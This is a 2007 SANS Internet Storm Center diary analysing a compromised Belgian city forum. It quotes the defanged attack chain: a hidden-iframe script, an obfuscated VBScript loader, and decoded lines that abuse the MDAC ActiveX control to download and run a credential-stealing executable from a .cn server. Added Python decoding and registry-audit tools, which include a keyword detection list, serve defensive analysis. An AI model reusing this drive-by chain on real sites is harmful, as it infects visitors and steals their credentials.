SANS ISC InfoSec Forums
Non-malicious compromise pointing to a benign VBScript!

Note: please tread carefully here. While we've obfuscated all malicious links, some of them are still live on the internet. Over the weekend we have been working with anti-virus vendors as well as the regional CERT team to have the issue resolved, but we haven't been quite as successful as we'd hoped. This attack doesn't merely apply to the site mentioned, but spreads out over hundreds of compromised sites - so you may want to filter the malicious URL mentioned.

At least if you believe everything your neighborhood webmaster tells you... Early last week, the forum of the website of Leuven, a major student town in Belgium, got compromised. National press reported the compromise occurred through so-called SQL infection (sic), after which links to a .cn web server were added. In an interview, an IT representative of the local government stated that the "hack was not malicious. No data on the website was removed, altered or stolen".

Reason enough for the Internet Storm Center to have a second look. Apparently several pages on the forum were altered to contain a script tag to:
hxxp://www /ms/ltxs.js
This JavaScript routes you to another page using a hidden iframe:
document.write("<ifra me width='0' height='0' src='hxxp ://www xvgaoke. cn/ms/ltxs.htm'></ifra me>");
The resulting page contains a piece of VBScript (reduced in size below for brevity), a hyperlink to Google and a counter hosted on a Chinese web server.
abc = "006F006E0020006500720072006F0072...65006E0022002C0030000D000A"
cde = "006F006E0020006500720072006F007...00065006E0022002C0030000D000A"
' Every character is stored as four hex digits; the chunk "0D0A" marks a line break
Function decode(x)
    For i = 1 To Len(x) Step 4
        If Mid(x, i, 4) = "0D0A" Then
            decode = decode & vbCrLf
        Else
            decode = decode & Chr(Int("&H" & Mid(x, i, 4)))
        End If
    Next
End Function
execute (decode(abc))
execute (decode(cde))

Naturally, we want to have a look at what this code does. It's easy to execute VBScripts on the desktop using the Windows Script Host, or WSH, and its tool wscript. The content can just be copied into a .vbs file and executed. However, that's not what we want to do here, since the script hands the decoded content to Execute, which would run the unknown payload on our own machine. Not a good idea.

So, let's change these commands around a bit. WScript exposes an Echo method that displays content on the screen in a message box instead of running it:

wscript.echo (decode(abc))
wscript.echo (decode(cde))
Running the modified script through wscript then displays some more VBScript, which includes the following code:
on error resume next
MircoLong="hxxp:// www xvgaoke. cn/ms/ltxs.vbs"
set MircoLonge=MircoLongc.createobject(m5,"")
MircoLonge.ShellExecute MircoLong9,BBS,BBS,"open",0
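The same "decode, never Execute" approach can be done outside the Windows Script Host entirely, which avoids any risk of the payload running by accident. The following Python script is an added example and is not the diary's code: it reimplements the decode() routine above (four hex digits per character, the chunk 0D0A standing for a line break), includes the inverse so a harmless sample blob can be constructed inline (the diary's real abc/cde strings are truncated on the page), and finally scans the decoded text for the kind of indicators seen in this diary (createobject, ShellExecute, the MDAC CLSID, an .exe name). The keyword list and the sample text are the author's own choices.

```python
"""Static decoder for the four-hex-digits-per-character VBScript obfuscation.

Added example (not the ISC diary's code). Mirrors the VBScript decode()
function so the payload can be read without passing it to Execute.
"""

# Tokens worth a second look in decoded script text (assumed list, not from the diary)
SUSPICIOUS = (
    "createobject",
    "shellexecute",
    "bd96c556-65a3-11d0-983a-00c04fc29e36",  # MDAC CLSID referenced in the diary
    ".exe",
)


def vbs_decode(hexblob: str) -> str:
    """Four hex digits -> one character; the literal chunk "0D0A" -> CRLF."""
    if len(hexblob) % 4:
        raise ValueError("blob length is not a multiple of 4 (truncated input?)")
    out = []
    for i in range(0, len(hexblob), 4):
        chunk = hexblob[i:i + 4]
        if chunk.upper() == "0D0A":
            out.append("\r\n")
        else:
            out.append(chr(int(chunk, 16)))
    return "".join(out)


def vbs_encode(text: str) -> str:
    """Inverse of vbs_decode(); only used here to build the constructed sample."""
    out, i = [], 0
    while i < len(text):
        if text.startswith("\r\n", i):
            out.append("0D0A")
            i += 2
        else:
            out.append(f"{ord(text[i]):04X}")
            i += 1
    return "".join(out)


def find_indicators(script: str) -> list:
    """Return the SUSPICIOUS tokens that occur in the decoded script (case-insensitive)."""
    low = script.lower()
    return [kw for kw in SUSPICIOUS if kw in low]


# Constructed sample: a harmless two-line script encoded the same way as abc/cde.
# Its blob starts with the same "006F006E0020..." prefix as the strings in the diary.
SAMPLE_PLAINTEXT = 'on error resume next\r\nmsgbox "hello"\r\n'
SAMPLE_BLOB = vbs_encode(SAMPLE_PLAINTEXT)


if __name__ == "__main__":
    decoded = vbs_decode(SAMPLE_BLOB)
    print(decoded)
    print("indicators found:", find_indicators(decoded))
```

Point the script at a real blob by pasting the hex string into vbs_decode(); the length check refuses strings cut short by an ellipsis, which is exactly the state of the strings quoted above. Any indicator hits in the output are a reason to keep analysing statically rather than run the decoded script.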
We can see a reference to BD96C556-65A3-11D0-983A-00C04FC29E36. This is the CLSID for a Microsoft Data Access Components (MDAC) control. On April 12th, 2006, a Microsoft advisory reported on a significant vulnerability in an ActiveX control that is part of ActiveX Data Objects (ADO), the control referenced in the exploit code above. Even today, this vulnerability is commonly exploited as part of so-called drive-by exploits.
Without being noticed, the code then downloads ltts.exe from the same server and executes it on the victim system. On August 25th, the malware had a SHA1 hash of c1cbee89ba1033b8e739067eab086f70b476c5aa and was about 50 kb in size. Five days after the compromise took place, the binary was detected by 9 out of 32 anti-virus solutions. Note that it's quite common for the people running such malicious web servers to change their malcode every so often, so as to reduce the risk of getting detected by anti-virus.
Once run on a system, the software drops a number of executables and installs one of them as the Userinit value under the Winlogon registry key, so that it is started at every logon. This makes for one of those pesky, difficult-to-remove pieces of spyware. In the end its final goal appears to be the gathering of World of Warcraft authentication credentials.
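A quick way to check a machine for this kind of persistence is to read the Userinit value and compare it against the stock entry. The following Python is an added example, not part of the diary: on Windows the value lives at HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit and is a comma-separated list that by default names only the system userinit.exe; anything appended to it runs at every interactive logon. The sample registry values below are constructed for the example, and the dropped-file name in the tampered sample is a placeholder, not the real malware's file name.

```python
"""Audit the Winlogon Userinit value for added persistence entries.

Added example (not the ISC diary's code). Works offline on constructed
sample values; read_live_userinit() only works on a Windows host.
"""
import ntpath

# Stock value on a default Windows install (assumed system root C:\Windows)
EXPECTED_USERINIT = r"C:\Windows\system32\userinit.exe"

# Constructed sample values, as the registry would return them
CLEAN_VALUE = r"C:\Windows\system32\userinit.exe,"
TAMPERED_VALUE = r"C:\Windows\system32\userinit.exe,C:\Windows\system32\EXAMPLE_dropped.exe,"


def parse_userinit(value: str) -> list:
    """Split the comma-separated value, dropping the empty trailing entry and quotes."""
    return [entry.strip().strip('"') for entry in value.split(",") if entry.strip()]


def unexpected_userinit_entries(value: str, expected: str = EXPECTED_USERINIT) -> list:
    """Return every entry that is not the expected userinit.exe path (case-insensitive).

    A bare "userinit.exe" without a directory is also flagged, since it would be
    resolved through the search path rather than pinned to system32.
    """
    want = ntpath.normcase(expected)
    return [entry for entry in parse_userinit(value) if ntpath.normcase(entry) != want]


def read_live_userinit() -> str:
    """Read the real value; only callable on Windows (winreg is Windows-only)."""
    import winreg
    key = winreg.OpenKey(
        winreg.HKEY_LOCAL_MACHINE,
        r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon",
    )
    try:
        value, _ = winreg.QueryValueEx(key, "Userinit")
    finally:
        winreg.CloseKey(key)
    return value


if __name__ == "__main__":
    for label, value in (("clean", CLEAN_VALUE), ("tampered", TAMPERED_VALUE)):
        flagged = unexpected_userinit_entries(value)
        print(f"{label}: {'OK' if not flagged else 'unexpected entries: ' + ', '.join(flagged)}")
```

On a live host, pass read_live_userinit() to unexpected_userinit_entries(); an empty list means only the stock entry is present. Removing a flagged entry is not enough on its own, since the dropped executable and the other files it installed are still on disk.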
If you're still wondering why these are so prized, run this small Google query. Online games such as WoW have recently begun to implement the concept of Real Money Transactions - yes, real money that you can lose by getting compromised and that others can gain.

So this leaves me wondering why exactly this was a non-malicious compromise?

Maarten Van Horenbeeck
Aug 28th 2007